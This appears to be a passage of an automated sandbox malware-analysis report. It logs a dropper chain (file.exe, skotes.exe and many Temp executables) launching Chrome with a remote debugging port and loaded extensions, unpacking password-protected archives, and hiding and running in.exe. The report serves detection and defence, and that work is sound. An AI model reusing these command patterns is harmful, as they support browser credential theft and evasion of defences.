                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8028
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8028
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7844
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7844
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: cd2469328d.exe, 0000000B.00000003.2613673604.0000000003567000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2614353900.0000000003535000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2692078477.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3569003818.00000000060F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3576461028.00000000060C5000.00000004.00000800.00020000.00000000.sdmp, 35f0a75b93.exe, 0000002B.00000003.3810485842.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3669476568.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3663084354.00000000054E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: file.exeReversingLabs: Detection: 57%
                              Source: file.exeVirustotal: Detection: 59%
                              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe "C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeProcess created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeProcess created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe "C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe "C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeProcess created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe "C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe "C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                              Source: unknownProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe "C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe"
                              Source: unknownProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe "C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe "C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe "C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,12670110117547472489,9919710974034133825,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2004,i,2036866093412023983,10134248747286953754,262144 /prefetch:8
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe "C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe "C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe "C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe"
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=2328,i,6628927633879078987,5168946575575726865,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2020,i,9689288529753768681,16251776256977340336,262144 /prefetch:8
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe "C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe "C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe "C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe "C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe "C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe "C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe "C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe "C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe "C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe "C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe "C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeProcess created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeProcess created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeProcess created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe "C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe"
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2020,i,9689288529753768681,16251776256977340336,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,12670110117547472489,9919710974034133825,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2004,i,2036866093412023983,10134248747286953754,262144 /prefetch:8
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                              Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=2328,i,6628927633879078987,5168946575575726865,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
